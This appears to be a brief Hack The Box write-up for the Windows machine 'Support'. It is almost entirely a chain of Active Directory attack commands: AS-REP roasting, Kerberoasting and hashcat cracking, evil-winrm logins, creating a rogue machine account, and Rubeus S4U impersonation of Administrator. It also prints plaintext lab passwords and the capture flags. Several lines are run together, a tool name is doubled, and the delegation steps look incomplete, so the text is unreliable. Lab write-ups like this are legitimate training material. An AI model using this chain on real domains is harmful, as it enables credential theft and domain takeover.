SupportPlatform: Hack The Box
IP Address: 10.129.230.181
Difficulty: Easy
Author: ARZ101
Support is an Easy-level Windows machine focusing on Active Directory enumeration and abuse. The foothold involves Kerberos and LDAP enumeration followed by abusing Service Principal Names (SPNs), MachineAccountQuota, and S4U delegation for privilege escalation to Administrator.
nmap -sC -sV -oN nmap.txt 10.129.230.181
GetNPUsers.py support.htb/ -no-pass -usersfile users.txt -dc-ip 10.129.230.181
windapsearch-linux-amd64 -d support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --dc 10.129.230.181 users
GetUserSPNs.py.GetUserSPNs.py support.htb/ldap:'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -dc-ip 10.129.230.181 -request
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
support : Ironside47pleasure40Watchfulevil-winrm -i support.htb -u support -p 'Ironside47pleasure40Watchful'
New-MachineAccount -MachineAccount UwU -Password (ConvertTo-SecureString '123456' -AsPlainText -Force)
impacket-secretsdump support/ldap@support.htb -hashes :<ntlm> -just-dc-user UwU$
Rubeus.exe s4u /user:UwU$ /password:123456 /domain:support.htb /impersonateuser:administrator /rc4:<NTLM> /msdsspn:host/dc.support.htb /nowrap
export KRB5CCNAME=~/UwU.ccache
evil-winrm -i support.htb -u administrator -k
user.txt: d7e3ad265a337cb48fd74fd3e6f346cdroot.txt: 8bcdfd59f348a37e9457649bdc554c77Rubeus and impacket are essential for advanced AD attacks.